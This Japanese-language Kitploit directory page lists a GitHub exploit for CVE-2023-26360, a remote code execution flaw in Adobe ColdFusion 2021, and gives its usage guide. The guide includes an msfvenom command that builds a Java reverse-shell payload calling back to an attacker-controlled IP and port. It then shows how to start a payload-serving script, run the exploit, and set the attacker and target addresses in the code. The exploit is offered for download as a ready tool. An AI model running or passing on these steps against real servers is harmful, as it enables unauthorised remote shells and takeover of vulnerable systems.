Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-26360-RCE — ColdFusion 2021 (CVE-2023-26360) におけるリモートコード実行のエクスプロイト | Kitploit
ツール/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

ColdFusion 2021 (CVE-2023-26360) におけるリモートコード実行のエクスプロイト

リポジトリを見る
19ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-26360 - ColdFusion 2021 におけるリモートコード実行

スクリプトは最初の試行で動作しないことがあります。数回試して動作させてください。

実行方法

msfvenom でペイロードを作成

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

server.py の起動

  • このサーバーは、cve.2023-26360.py による初期アクセス後に ColdFusion サーバーにペイロードを送信するため、最初に起動しておく必要があります。
root@kitploit:~
python3 server.py 8000
  • 引数 8000 はサーバーが待ち受けるポートです。

  • 12行目でサーバーのIPアドレスを設定していることに注意してください。そのため、変更してください:

root@kitploit:~
s.bind(('192.168.56.1',port))

cve-2023-26360.py の実行

  • エクスプロイトを実行するには、次のコマンドを実行します:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • server.py と同様に、引数 8000 は server.py が待ち受けるポートです。そのため、両方のコマンドで同じにする必要があります。

  • cve-2023-26360.py の8行目で server.py が待ち受けるIPアドレスを設定します。正しく設定する必要があります。

  • cve-2023-26360.py の11行目で ColdFusion サーバーのIPアドレスを設定します。そのため、変更してください:

root@kitploit:~
url = "http://192.168.56.102:8500"

動作確認環境

  • ColdFusion 2021 - Windows Server 2019
ツールをダウンロード